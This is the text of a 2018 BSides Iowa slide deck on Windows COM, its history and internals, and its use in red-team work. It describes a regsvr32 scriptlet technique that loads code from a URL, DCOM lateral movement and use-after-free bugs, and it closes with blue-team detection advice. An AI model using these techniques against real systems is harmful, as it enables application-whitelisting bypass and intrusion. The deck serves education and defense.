Presentation at BSides Iowa 2018 discussing the background of Windows COM, red team value of Windows COM, and how blue teams can also use this knowledge.
2. NEW PHONE; WHO DIS
▸IT Internal Audit Manager, Red Team at
ACI Worldwide
▸Previously: Red Team, Pen Tester, IT
▸@maendarb
▸https://vivirytech.blogspot.com
▸There will be pictures, minimal C++
5. WHAT’S THIS WINDOWS COM THING?
▸ Stands for “Component Object Model”
▸ Designed in the 90s to be interoperable, portable
▸ It’s old; great books aren’t digital
▸ Not a “Shell” like CMD or PowerShell
▸ “Like” .NET and WMI
▸ Why am I so interested in this?
6. WHAT’S THIS WINDOWS COM THING? RULE #1: WE DON’T SPEAK ABOUT COM
▸ Used everywhere in Windows
▸ When a user copies files, embeds Excel within Word
▸ It’s abstracted away with GUIs, .Net, APIs, and no one
acknowledges that COM objects are being used
7. COM BACKGROUND: COM LIVES EVERYWHERE
▸ Obligatory COM history
▸ Precursor to .NET
▸ Meant to solve problems with developers like DLLs
▸ There’s so many COM objects and won’t go away
▸ OLE and ActiveX fit in here
▸ OLE (Object Linking and Embedding) lets you
embed things (e.g. Excel sheet inside Word)
▸ ActiveX lets Internet Explorer make bad life choices
8. COM BACKGROUND: COM ON PAPER IS SUPER EASY TO WORK WITH
▸ Access COM things thru interfaces and objects
▸ Scripting.FileSystemObject
▸ IPersist
▸ IFileOperation
▸ WScript.Shell
http://compinfopro.com/enable-remote-desktop-enable-rdp/
10. COM BACKGROUND: ITS LIKE COM MAKES UP THE RULES AS IT GOES ALONG
▸ COM is a hot mess and can live in:
▸ Windows Registry
▸ Windows made a special registry hive
▸ HKCR (HKEY_Classes_Root)
▸ Combines HKLM and HKCU
▸ Threading / InProcServer32
▸ Manifest files (COM scriptlets; Registration free too!)
13. COM BACKGROUND: COM+ SCRIPTLET? (MOST LIKELY IT WAS JUST COM)
▸ Scriptlets come in both COM and COM+ flavors
▸ They allow you to have COM scripts to do non-
malicious things like open calculator and cmd shells
▸ Did you know you can create COM objects from a
Java class? Good thing no one has a JRE installed.
https://msdn.microsoft.com/en-us/library/ms524620(v=vs.90).aspx
15. COM BACKGROUND: BREAKING DOWN THAT REGSVR32 HAX
▸ regsvr32 is used to register many things in the registry
▸ /s runs it silently, /n says to not call DllRegisterServer
▸ /u specifies which COM server to uninstall
▸ /i calls DllInstall of the COM object to register
▸ Can be pointed to a file on your system
▸ Can be a URL (http: COM moniker)
▸ Could even be a Java class (java: COM moniker)
▸ scrobj.dll makes the magic go
http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
16. COM BACKGROUND: COM+
▸ COM+ meant to solve the problems in COM like:
▸ Quickly implement common configurations for COM
components like security boundaries
▸ Load DLLs into processes on demand
▸ Managed methods to manage COM components
▸ Multi-pass… err.. threading
▸ Slick GUI
https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx
17. COM BACKGROUND: COM+
▸ COM+ also came with rad icons in the GUI
▸ Demo!
https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx
18. COM BACKGROUND: DCOM
▸ DCOM is “Distributed COM”
▸ “Helps you” in COM and COM+ with distributed
transactions
▸ Slings COM object data typically with RPC
▸ Likes to make assumptions you know what you’re
doing with security and marshaling data
▸ James Forshaw and Matt Nelson have been finding
problems with Windows and apps marshaling data
▸ DCOM lateral movement script (enigma0x3)
https://github.com/rvrsh3ll/Misc-Powershell-Scripts/
blob/master/Invoke-DCOM.ps1
19. COM BACKGROUND: .NET TO COM (BECAUSE LEGACY APPS AND SADNESS)
▸ .NET can work with COM for interoperability
▸ “The Runtime Callable Wrapper (RCW) is a
mechanism that promotes transparent
communication between COM and the managed
programming model.”
https://msdn.microsoft.com/en-us/library/office/bb610378.aspx
20. COM BACKGROUND: BREAKING DOWN THAT SWEET RCW GOODNESS
▸ This is what PowerShell uses to call into COM objects
https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/
ComInterop/ComObject.cs
21. COM BACKGROUND: COM TO .NET (BUT WHY WOULD YOU DO THIS)
▸ COM can work with .Net thru COM Callable Wrappers
▸ “When a COM client calls a .NET object, the common
language runtime creates the managed object and a
COM callable wrapper (CCW) for the object. Unable
to reference a .NET object directly, COM clients use
the CCW as a proxy for the managed object.”
https://msdn.microsoft.com/en-us/library/f07c8z1c(v=vs.85).aspx
22. COM BACKGROUND: DEEP TECHNICAL DETAIL OF THAT MAGIC
▸ James Forshaw talked about .Net and COM
interoperability at DerbyCon 2017
▸ IronGeek Link: ig2.me/pZ
23. COM BACKGROUND: THE DEEPER YOU GO, THE MORE C/C++ YOU’LL KNOW
▸ To dig in more, you’re going to have to know C, C++
https://blogs.msdn.microsoft.com/oldnewthing/20040205-00/?p=40733
24. COM EXPLOITATION: KNOWING THE C++ STORY CAN BE HELPFUL
▸ QueryInterface is how you query… for interfaces
▸ This is how you figure out what interfaces are
available to you
▸ AddRef / Release may be important to you eventually
▸ Important if you want to partake in bug bounties :)
▸ This dictates the object lifetime by reference count
▸ Abusing the reference count introduces other
avenues of attack (cough Use After Free)
▸ If open redirects are still around, we should fix those first
https://blog.zsec.uk/cve-2017-3528/
25. COM EXPLOITATION: USE AFTER FREE HAS ALWAYS BEEN AN ISSUE
▸ Raymond Chen talked about this in 2004
▸ Exploit DB has stuff on AddRef being misused
https://blogs.msdn.microsoft.com/oldnewthing/20040406-00/?p=39903
https://www.exploit-db.com/exploits/41042/
26. COM EXPLOITATION: COM, THE NEVER-ENDING STRUGGLE BUS
▸ Microsoft is still fixing COM related issues
▸ CVE-2018-0880/0882 ; Forshaw - A Bridge Too Far
▸ Researched by Haifei Li, Mark Dowd, James Forshaw
▸ Links posted on https://vivirytech.blogspot.com
▸ COM has a reoccurring theme at conferences
forgotten/“rediscovered”, but still broke (lulz)
▸ Kinda like Adobe issues, right?
27. COM EXPLOITATION: WHAT ARE FUN WAYS COM HAS BEEN EXPLOITED?
▸ How is COM exploited?
▸ UACMe
▸ James Forshaw
▸ Casey Smith
▸ Matt Nelson
28. COM EXPLOITATION: WHAT TOOLS CAN I USE TO LEARN MORE? ALL FREE!
▸ Microsoft Process Explorer
▸ Find medium to high integrity attack paths
▸ ReactOS
▸ James Forshaw OleViewDotNet
(github.com/tyranid/oleviewdotnet)
▸ See the COM goodies in Windows
▸ Find new unexplored attack COM paths!
29. WINDOWS COM, MICROSOFT’S GIFT TO THE RED TEAM
▸ Holy attack surface Batman! Thanks OleViewDotNet!
▸ 3,592 ways to see if you can discover a new attack path
30. WHAT HAPPENS WHEN I PRESS THIS BUTTON?
▸ Hey kid, wanna crash something? (this can peg your CPU)
▸ Watch with Process Monitor for potential attack paths
https://github.com/FuzzySecurity/DefCon25
fondue.exe may be a privilege escalation path
31. WE NEED THE BLUE TEAM, AND THEY NEED US
▸ There’s a lot of fun things that leverage COM
▸ ZeroSum’s Koadic: COM C&C
▸ MITRE’s ATT&CK framework
▸ @SubTee tweets (seriously)
▸ We need to use their research to our gain
▸ Run things like Squiblydoo to see EDR response
▸ Work with the product groups and blue team
▸ See how these products trigger IOCs and act
32. BLUE TEAM FUN!
▸ Are you running Windows 10 RS4 / Windows Server 2016?
▸ SpecterOps Device Guard configs / guide
▸ Are you doing PowerShell cmdline audit AND reviewing?
▸ Users probably don’t run PowerShell, if they do, use v5+
▸ Pick up on keywords like, “-COMObject”
▸ Do you really need wscript and cscript enabled?
▸ It can be done, ask @fpieces, he’s done it
▸ Deters attacks leveraging DotNetToJScript
▸ Investigate the potential of SysMon and Project VAST
33. ITS ALMOST TIME TO GO, LETS REVIEW QUICKLY
▸ COM is everywhere as it was ~20 years ago
▸ Lots of things not covered like “TreatAs” and monikers
▸ Many “exploits” are just abusing design decisions
▸ More research and community made tools will (most
likely) bring to light more COM exploits and wreckage
▸ Other organizations also add their own COM objects
▸ Sad face:
34. LEARN MORE AND CONTACT ME BELOW
▸ For more info about COM:
▸ https://vivirytech.blogspot.com
▸ @maendarb
▸ Slack: https://omasec.herokuapp.com